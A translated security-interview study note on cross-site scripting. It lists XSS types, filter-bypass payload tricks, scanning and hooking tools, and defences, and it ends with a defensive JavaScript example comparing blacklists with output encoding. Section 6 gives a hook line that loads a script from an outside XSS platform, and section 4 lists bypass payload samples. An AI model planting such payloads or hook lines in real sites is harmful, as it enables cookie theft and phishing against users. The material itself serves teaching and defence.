Security Interview: XSS (Cross-Site Scripting)
2022-07-06 09:23:00 【不知名白帽】
1. XSS principle: developers fail to filter input properly, so an attacker can close the surrounding tag and then insert and execute malicious JS code.
2. XSS types
DOM-based: the payload is parsed and executed by the DOM itself
Reflected: plug-and-play; the payload is not stored in the database
Stored: the payload is saved in the database, which makes the attack persistent
3. Commonly used JS functions
document.cookie: the browser cookie for the current site (a property, not a function; the original wrote it as document.cookie())
console.log('xss'): writes a log message to the console
4. Bypass techniques
4.1. Change case: <SCript>
4.2. Encoding bypass (HTML entity encoding; decimal, hexadecimal and octal encoding; Unicode encoding)
4.3. Close the tag: use a > to close the enclosing tag so the XSS takes effect
4.4. Double writing: <scr<script>ipt>
4.5. Use spaces, newlines, tabs, or /**/ and /*!a*/ to get past keyword detection
4.6. Use / instead of a space
4.7. Use backticks instead of parentheses and double quotes
4.8. Use throw instead of parentheses
4.9. Use an HTML entity in place of the colon
4.10. Use JSFuck encoding to bypass most character filters
5. Scanning tools
XSStrike (spelled "xsstrick" in the original)
6. XSS hooking / phishing platforms
Kali tool: BeEF
Free platform: https://xss.pt/
Hook statement: <img src=https://xss.pt/hook.js>
7. XSS defense
7.1. Filter sensitive strings, e.g. alert(), <script>, onerror
7.2. Add the HttpOnly flag: the cookie is kept away from front-end JS code
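As an added example (not code from the original post), the following contrasts the keyword blacklist of 7.1 with context-aware HTML output encoding, using the case-change and double-write samples from section 4 as constructed inputs, and builds the HttpOnly cookie header from 7.2. The filter, the escape table and the cookie attributes are the author's choices, not taken from any framework.

```javascript
// Naive blacklist filter in the spirit of 7.1: strip a few sensitive tokens.
// It is case-sensitive and single-pass, which is exactly what 4.1 and 4.4 exploit.
function blacklistFilter(input) {
  return input.replace(/<script>/g, '').replace(/onerror/g, '');
}

// Output encoding for an HTML text/attribute context: every character that can
// open or close markup or an attribute value is replaced by an entity, so no
// bypass of the kind listed in section 4 can re-create a tag.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};
function escapeHtml(input) {
  return String(input).replace(/[&<>"'/]/g, (ch) => HTML_ESCAPES[ch]);
}

// A value is safe to place in an HTML text node only if no raw angle bracket survives.
function containsMarkup(s) {
  return /[<>]/.test(s);
}

// Constructed inputs taken from the bypass list in section 4.
const SAMPLES = [
  '<SCript>alert(1)</SCript>',          // 4.1 case change
  '<scr<script>ipt>alert(1)</script>',  // 4.4 double write
];

// For each sample: does markup survive the blacklist? Does it survive encoding?
function compare() {
  return SAMPLES.map((s) => ({
    input: s,
    filtered: blacklistFilter(s),
    filteredStillHasMarkup: containsMarkup(blacklistFilter(s)),
    escaped: escapeHtml(s),
    escapedStillHasMarkup: containsMarkup(escapeHtml(s)),
  }));
}

// Defence 7.2: a session cookie carrying HttpOnly cannot be read through
// document.cookie even if script injection succeeds; Secure and SameSite are
// added here as the usual companions (an assumption of this example).
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}
```

Running compare() shows that both bypass samples keep live markup after the blacklist but none after escaping, which is why output encoding, not keyword filtering, is the primary defence.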